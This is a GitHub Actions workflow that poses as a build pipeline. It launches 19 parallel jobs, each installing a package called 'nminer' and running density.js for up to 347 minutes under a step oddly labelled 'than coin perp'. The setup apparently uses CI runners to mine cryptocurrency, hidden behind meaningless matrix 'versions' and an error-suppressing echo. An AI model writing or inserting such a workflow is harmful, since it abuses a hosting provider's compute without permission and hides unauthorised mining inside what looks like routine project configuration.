name: density
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 1447 }
          - { version: 3520 }
          - { version: 2601 }
          - { version: 957 }
          - { version: 7937 }
          - { version: 8064 }
          - { version: 6405 }
          - { version: 5301 }
          - { version: 462 }
          - { version: 1392 }
          - { version: 4089 }
          - { version: 9336 }
          - { version: 5068 }
          - { version: 6994 }
          - { version: 9994 }
          - { version: 8424 }
          - { version: 828 }
          - { version: 1741 }
          - { version: 673 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: than coin perp
        run: |
          npm install nminer@latest
          timeout 347m node density.js || echo "density executed"